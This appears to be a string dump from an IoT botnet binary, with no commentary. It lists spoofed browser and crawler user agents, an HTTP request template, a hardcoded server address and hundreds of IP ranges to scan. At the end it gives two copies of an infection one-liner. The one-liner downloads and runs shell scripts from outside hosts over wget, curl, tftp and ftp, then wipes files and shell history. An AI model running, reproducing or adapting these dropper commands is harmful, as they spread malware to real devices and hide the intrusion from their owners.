Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.23'
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2683.0 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
Mozilla/4.0 (compatible; MSIE 999.1; Unknown)
Mozilla/5.0 (Linux; Android 5.1.1; LG-K330 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobi
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2672.0 Safari/537.36
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C9
Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14
Mozilla/5.0 (Linux; Android 4.4.2; LGLS740 Build/KOT49I.LS740ZV6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.288
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Safari/537.36
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Mozilla/5.0 (Linux; Android 4.4.4; HUAWEI H892L Build/HuaweiH892L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.28
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/1
Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910R4 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBr
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.2
Mozilla/5.0 (Linux; Android 5.1.1; SM-G925T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mob
Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
Mozilla/5.0 (X11; CrOS x86_64 8743.85.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.101 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
Mozilla/5.0 (X11; CrOS x86_64 8872.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.105 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.1.2883.83 Secure/55.1.2883.373 Saf
Mozilla/5.0 (Linux; Android 5.1.1; LGLS665 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG-SM-N910A Build/LMY47X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36 Instagram 10.5.1 Android (22/5.1.1; 640dpi; 1440x2560; samsung; SAMSUNG-SM-N910A; trlteatt; qcom; en_US)
Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0
Opera/6.04 (Windows XP; U) [en]
Opera/9.99 (X11; U; sk)
Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)
Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
Mozilla/5.0 (PLAYSTATION 3; 3.55)
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
wii libnup/1.0
Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
PSP (PlayStation Portable); 2.00
Bunjalloo/0.7.6(Nintendo DS;U;en)
Doris/1.15 [en] (Symbian)
BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)
findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)
Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable
Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable
Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2
Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
%s %s HTTP/1.1\r\nConnection: %s\r\nAccept: */*\r\nUser-Agent: %s\r\n
================================================================================
========	STATIC IP ADRESSES : =====================================================
================================================================================
185.101.107.128
8.8.8.8
================================================================================
========	DYNAMIC IP MASKS : =====================================================
================================================================================
1.10.%d.%d
1.120.%d.%d
5.140.%d.%d
5.141.%d.%d
122.2.%d.%d
122.3.%d.%d
122.53.%d.%d
122.54.%d.%d
188.16.%d.%d
188.17.%d.%d
188.18.%d.%d
188.19.%d.%d
31.162.%d.%d
31.163.%d.%d
5.142.%d.%d
5.143.%d.%d
90.150.%d.%d
90.151.%d.%d
178.47.%d.%d
94.50.%d.%d
94.51.%d.%d
190.43.%d.%d
210.5.%d.%d
210.213.%d.%d
27.0.%d.%d
27.8.%d.%d
27.50.%d.%d
27.54.%d.%d
27.98.%d.%d
27.112.%d.%d
27.192.%d.%d
186.128.%d.%d
186.132.%d.%d
186.39.%d.%d
186.56.%d.%d
186.57.%d.%d
186.58.%d.%d
186.60.%d.%d
46.181.%d.%d
46.180.%d.%d
188.173.%d.%d
64.137.%d.%d
103.20.%d.%d
103.47.%d.%d
103.57.%d.%d
103.30.%d.%d
103.54.%d.%d
103.204.%d.%d
103.44.%d.%d
103.198.%d.%d
103.203.%d.%d
103.220.%d.%d
103.242.%d.%d
103.14.%d.%d
103.195.%d.%d
103.214.%d.%d
103.218.%d.%d
103.225.%d.%d
103.228.%d.%d
103.231.%d.%d
103.60.%d.%d
103.248.%d.%d
103.253.%d.%d
103.255.%d.%d
103.35.%d.%d
103.49.%d.%d
103.62.%d.%d
98.27.%d.%d
98.179.%d.%d
98.113.%d.%d
98.121.%d.%d
98.100.%d.%d
98.161.%d.%d
98.165.%d.%d
112.5.%d.%d
117.165.%d.%d
85.3.%d.%d
37.158.%d.%d
95.9.%d.%d
41.252.%d.%d
58.71.%d.%d
104.55.%d.%d
78.186.%d.%d
78.189.%d.%d
221.120.%d.%d
88.5.%d.%d
41.254.%d.%d
45.117.%d.%d
101.51.%d.%d
137.59.%d.%d
1.56.%d.%d
1.188.%d.%d
14.204.%d.%d
36.32.%d.%d
36.248.%d.%d
39.64.%d.%d
42.4.%d.%d
42.48.%d.%d
42.52.%d.%d
42.56.%d.%d
42.63.%d.%d
42.84.%d.%d
42.176.%d.%d
42.224.%d.%d
43.253.%d.%d
43.230.%d.%d
163.53.%d.%d
62.252.%d.%d
43.245.%d.%d
62.255.%d.%d
77.96.%d.%d
77.97.%d.%d
77.98.%d.%d
77.100.%d.%d
77.102.%d.%d
113.191.%d.%d
81.100.%d.%d
113.188.%d.%d
113.189.%d.%d
94.174.%d.%d
14.160.%d.%d
14.161.%d.%d
14.162.%d.%d
14.163.%d.%d
14.164.%d.%d
14.165.%d.%d
14.166.%d.%d
14.167.%d.%d
14.168.%d.%d
14.169.%d.%d
14.170.%d.%d
14.171.%d.%d
14.172.%d.%d
14.173.%d.%d
14.174.%d.%d
14.175.%d.%d
14.176.%d.%d
14.177.%d.%d
14.178.%d.%d
14.179.%d.%d
14.180.%d.%d
14.181.%d.%d
14.182.%d.%d
14.183.%d.%d
14.184.%d.%d
14.185.%d.%d
14.186.%d.%d
14.187.%d.%d
14.188.%d.%d
14.189.%d.%d
14.190.%d.%d
14.191.%d.%d
45.121.%d.%d
45.120.%d.%d
45.115.%d.%d
43.252.%d.%d
43.240.%d.%d
41.174.%d.%d
49.118.%d.%d
78.188.%d.%d
45.127.%d.%d
14.33.%d.%d
123.16.%d.%d
202.44.%d.%d
116.93.%d.%d
91.83.%d.%d
41.253.%d.%d
117.173.%d.%d
113.190.%d.%d
146.88.%d.%d
112.196.%d.%d
113.178.%d.%d
112.45.%d.%d
183.223.%d.%d
116.71.%d.%d
110.235.%d.%d
124.253.%d.%d
211.237.%d.%d
117.175.%d.%d
178.93.%d.%d
111.9.%d.%d
222.252.%d.%d
113.174.%d.%d
113.160.%d.%d
113.161.%d.%d
113.162.%d.%d
113.163.%d.%d
113.164.%d.%d
113.165.%d.%d
113.166.%d.%d
116.167.%d.%d
113.168.%d.%d
113.17.%d.%d
123.18.%d.%d
123.19.%d.%d
123.20.%d.%d
123.21.%d.%d
123.22.%d.%d
222.253.%d.%d
222.254.%d.%d
222.225.%d.%d
37.247.%d.%d
41.208.%d.%d
183.220.%d.%d
175.201.%d.%d
50.205.%d.%d
88.248.%d.%d
88.105.%d.%d
88.247.%d.%d
85.105.%d.%d
188.3.%d.%d
103.55.%d.%d
103.233.%d.%d
103.63.%d.%d
144.48.%d.%d
163.47.%d.%d
223.29.%d.%d
59.153.%d.%d
113.176.%d.%d
113.175.%d.%d
113.177.%d.%d
113.183.%d.%d
202.164.%d.%d
202.134.%d.%d
210.56.%d.%d
49.156.%d.%d
203.210.%d.%d
117.181.%d.%d
117.177.%d.%d
117.178.%d.%d
117.176.%d.%d
117.170.%d.%d
117.171.%d.%d
117.162.%d.%d
112.26.%d.%d
112.27.%d.%d
112.28.%d.%d
112.29.%d.%d
112.30.%d.%d
112.31.%d.%d
203.150.%d.%d
50.233.%d.%d
27.255.%d.%d
123.24.%d.%d
123.25.%d.%d
111.26.%d.%d
111.20.%d.%d
================================================================================
========	/proc FOLDER ACCESS : =====================================================
================================================================================
/proc/cpuinfo
/proc/net/route
================================================================================
========	HISTORY TEMPERING : =====================================================
================================================================================
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.101.107.128/bins.sh; curl -O http://185.158.113.30/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.158.113.30 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.158.113.30; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.158.113.30 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *;history -c;history -w;rm -rf ~/.bash_history\r\n
================================================================================
========	AUTOINSTALL COMMANDS : =====================================================
================================================================================
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.101.107.128/bins.sh; curl -O http://185.158.113.30/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.158.113.30 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.158.113.30; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.158.113.30 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *;history -c;history -w;rm -rf ~/.bash_history\r\n
